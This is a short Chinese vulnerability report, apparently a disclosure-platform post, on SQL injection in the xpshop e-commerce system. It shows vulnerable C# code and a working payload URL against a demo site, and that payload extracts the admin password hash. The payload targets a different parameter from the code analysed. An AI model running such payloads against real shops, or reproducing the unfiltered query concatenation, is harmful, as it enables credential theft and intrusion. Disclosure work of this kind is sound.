xpshop网店系统sql注入(demo演示)

漏洞作者: 不能忍

详细说明:

漏洞位置:xpshop.webui.MyRefund

protected void Page_Load(object sender, EventArgs e)
		{
			if (Utils.request(base.Request.QueryString["type"]) && Utils.request(base.Request.QueryString["Action"]))
			{
				string text = base.Request.QueryString["Action"];
				if (text != null)
				{
					if (!(text == "GetImg"))
					{
						if (text == "GetPackageGID")
						{
							base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"])));
						}
					}
					else
					{
						this.GetImg(base.Request.QueryString["pids"]);
					}

跟进函数GetPackagePdtGID:

public int GetPackagePdtGID(int productID)

		{

			object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "select GoodsID from Goods where ProductID = " + productID, null);

			return (obj != null) ? ((int)obj) : 0;

		}
 

没过滤直接进库,直接回显的!

payload:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

漏洞证明:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

15163708e38982fcb6bb68a83287ad5c51236c81[1]

发表评论